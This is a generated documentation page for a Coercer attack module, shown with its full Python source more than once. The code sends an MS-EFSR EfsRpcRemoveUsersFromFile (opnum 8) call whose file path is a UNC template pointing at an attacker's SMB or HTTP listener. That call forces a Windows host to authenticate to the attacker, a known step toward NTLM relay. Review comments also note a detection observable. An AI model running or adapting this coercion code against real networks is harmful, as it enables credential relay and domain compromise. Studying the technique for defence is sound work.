coercer.methods.MS_EFSR.EfsRpcRemoveUsersFromFile
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcRemoveUsersFromFile.py
# Author             : XiaoliChan
# Date created       : 18 Mar 2023
#
# Coercer method module for MS-EFSR opnum 8 (EfsRpcRemoveUsersFromFile).
# The NDR classes describe the request/response wire layout for impacket;
# the EfsRpcRemoveUsersFromFile class at the bottom is the framework-facing
# method description (path templates, transports, metadata, trigger()).


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
# NOTE(review): DCERPCSessionError is imported but never referenced in this file.
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
# NOTE(review): only WSTR, DWORD, PCHAR, RPC_SID and LPWSTR are used below;
# the other names in this import are unused here.
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class EFS_HASH_BLOB(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR EFS_HASH_BLOB structure as used by this module.

    Fields, in wire order: 'Data' (DWORD) then 'cbData' (PCHAR pointer).
    NOTE(review): the MS-EFSR IDL names the DWORD byte count ``cbData`` and
    the pointer ``bData``, so the names here look swapped relative to the
    spec; confirm before addressing these fields by name. trigger() never
    assigns this structure, so it is presumably marshalled with impacket's
    defaults.
    """

    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR ENCRYPTION_CERTIFICATE_HASH structure.

    Fields, in wire order: 'Lenght' (DWORD; the key is misspelled, but it is a
    runtime dictionary key so it is left as is), 'SID' (RPC_SID, embedded
    inline), 'Hash' (EFS_HASH_BLOB, embedded inline) and 'Display' (LPWSTR).
    NOTE(review): in the IDL the SID and hash members are pointers rather
    than inline structures — verify the marshalling if a server ever rejects
    the request on argument parsing.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )


class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR ENCRYPTION_CERTIFICATE_HASH_LIST structure.

    'Cert' (DWORD) is the certificate-hash count and 'Users' holds a single
    ENCRYPTION_CERTIFICATE_HASH inline. ``align = 1`` sets impacket's NDR
    alignment for this struct to one byte, i.e. presumably no padding.
    NOTE(review): the IDL declares Users as a count-sized array of pointers;
    this module only ever sends the default-initialised structure.
    """
    align = 1
    structure = (
        ('Cert', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )


class _EfsRpcRemoveUsersFromFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/28609dad-5fa5-4af9-9382-18d40e3e9dec)

    opnum 8; 'FileName' (WSTR) is the only argument trigger() populates,
    'Users' is sent with its default value.
    """
    opnum = 8
    structure = (
        ('FileName', WSTR),
        ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
    )


class _EfsRpcRemoveUsersFromFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    No fields are declared, so nothing is parsed from the reply body;
    trigger() discards the response object anyway.
    """
    structure = ()


class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcRemoveUsersFromFile (opnum 8) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    NOTE(review): the original docstring named EfsRpcOpenFileRaw (opnum 0);
    both the request class and the ``function`` dict below use opnum 8.

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates tried as the FileName argument. {{listener}},
    # {{*_listen_port}} and {{rnd(N)}} are placeholders presumably expanded by
    # the framework before self.path is set; expansion is not done in this file.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings to try. "ncan_np" (named pipes; the
    # spelling is the project's own key, read elsewhere — do not rename it
    # here) lists pipe name + interface UUID/version; "ncacn_ip_tcp" lists
    # UUID/version only. From a defender's point of view, a bind to one of
    # these interface UUIDs followed by an opnum 8 call whose FileName is a
    # UNC path to another host is presumably the observable a detection
    # rule would key on.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    # Protocol metadata shown by the framework.
    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Function metadata; "vulnerable_arguments" names the field that carries
    # the path template (the only field trigger() sets).
    function = {
        "name": "EfsRpcRemoveUsersFromFile",
        "opnum": 8,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcRemoveUsersFromFile request with ``self.path`` as FileName.

        Args:
            dcerpc_session: connected impacket DCE/RPC session, or None when
                connect() was not called first.
            target: unused in this body; kept for the framework's trigger()
                signature.

        Returns:
            "" when the request completed without raising, the caught
            exception object when it raised, or None when no session was
            supplied (an error line is printed in that case).
        """
        if dcerpc_session is not None:
            try:
                request = _EfsRpcRemoveUsersFromFile()
                # self.path is presumably the expanded exploit_paths template,
                # set by the framework; only FileName is populated here.
                request['FileName'] = self.path
                # NOTE(review): resp is never read — the reply is not inspected.
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                # Broad catch by design: the exception object itself is handed
                # back to the caller (DCERPCSessionError is imported above but
                # not matched on here).
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class EFS_HASH_BLOB(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR EFS_HASH_BLOB structure as used by this module.

    Fields, in wire order: 'Data' (DWORD) then 'cbData' (PCHAR pointer).
    NOTE(review): the MS-EFSR IDL names the DWORD byte count ``cbData`` and
    the pointer ``bData``, so the names here look swapped relative to the
    spec; confirm before addressing these fields by name. trigger() never
    assigns this structure, so it is presumably marshalled with impacket's
    defaults.
    """

    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR ENCRYPTION_CERTIFICATE_HASH structure.

    Fields, in wire order: 'Lenght' (DWORD; the key is misspelled, but it is a
    runtime dictionary key so it is left as is), 'SID' (RPC_SID, embedded
    inline), 'Hash' (EFS_HASH_BLOB, embedded inline) and 'Display' (LPWSTR).
    NOTE(review): in the IDL the SID and hash members are pointers rather
    than inline structures — verify the marshalling if a server ever rejects
    the request on argument parsing.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
class
ENCRYPTION_CERTIFICATE_HASH_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
    """
    NDR layout of the MS-EFSR ENCRYPTION_CERTIFICATE_HASH_LIST structure.

    'Cert' (DWORD) is the certificate-hash count and 'Users' holds a single
    ENCRYPTION_CERTIFICATE_HASH inline. ``align = 1`` sets impacket's NDR
    alignment for this struct to one byte, i.e. presumably no padding.
    NOTE(review): the IDL declares Users as a count-sized array of pointers;
    this module only ever sends the default-initialised structure.
    """
    align = 1
    structure = (
        ('Cert', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Cert', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcRemoveUsersFromFile (opnum 8) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    NOTE(review): the original docstring named EfsRpcOpenFileRaw (opnum 0);
    both the request class and the ``function`` dict below use opnum 8.

    Method found by:
    - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates tried as the FileName argument. {{listener}},
    # {{*_listen_port}} and {{rnd(N)}} are placeholders presumably expanded by
    # the framework before self.path is set; expansion is not done in this file.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings to try. "ncan_np" (named pipes; the
    # spelling is the project's own key, read elsewhere — do not rename it
    # here) lists pipe name + interface UUID/version; "ncacn_ip_tcp" lists
    # UUID/version only. From a defender's point of view, a bind to one of
    # these interface UUIDs followed by an opnum 8 call whose FileName is a
    # UNC path to another host is presumably the observable a detection
    # rule would key on.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    # Protocol metadata shown by the framework.
    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Function metadata; "vulnerable_arguments" names the field that carries
    # the path template (the only field trigger() sets).
    function = {
        "name": "EfsRpcRemoveUsersFromFile",
        "opnum": 8,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcRemoveUsersFromFile request with ``self.path`` as FileName.

        Args:
            dcerpc_session: connected impacket DCE/RPC session, or None when
                connect() was not called first.
            target: unused in this body; kept for the framework's trigger()
                signature.

        Returns:
            "" when the request completed without raising, the caught
            exception object when it raised, or None when no session was
            supplied (an error line is printed in that case).
        """
        if dcerpc_session is not None:
            try:
                request = _EfsRpcRemoveUsersFromFile()
                # self.path is presumably the expanded exploit_paths template,
                # set by the framework; only FileName is populated here.
                request['FileName'] = self.path
                # NOTE(review): resp is never read — the reply is not inspected.
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                # Broad catch by design: the exception object itself is handed
                # back to the caller (DCERPCSessionError is imported above but
                # not matched on here).
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
def trigger(self, dcerpc_session, target):
    """
    Send one EfsRpcRemoveUsersFromFile request with ``self.path`` as FileName.

    Args:
        dcerpc_session: connected impacket DCE/RPC session, or None when
            connect() was not called first.
        target: unused in this body; kept for the framework's trigger()
            signature.

    Returns:
        "" when the request completed without raising, the caught exception
        object when it raised, or None when no session was supplied (an
        error line is printed in that case).
    """
    if dcerpc_session is not None:
        try:
            request = _EfsRpcRemoveUsersFromFile()
            # self.path is presumably the expanded exploit_paths template,
            # set by the framework; only FileName is populated here.
            request['FileName'] = self.path
            # NOTE(review): resp is never read — the reply is not inspected.
            resp = dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad catch by design: the exception object itself is handed
            # back to the caller (DCERPCSessionError is imported at file
            # level but not matched on here).
            return err
    else:
        print("[!] Error: dce is None, you must call connect() first.")
        return None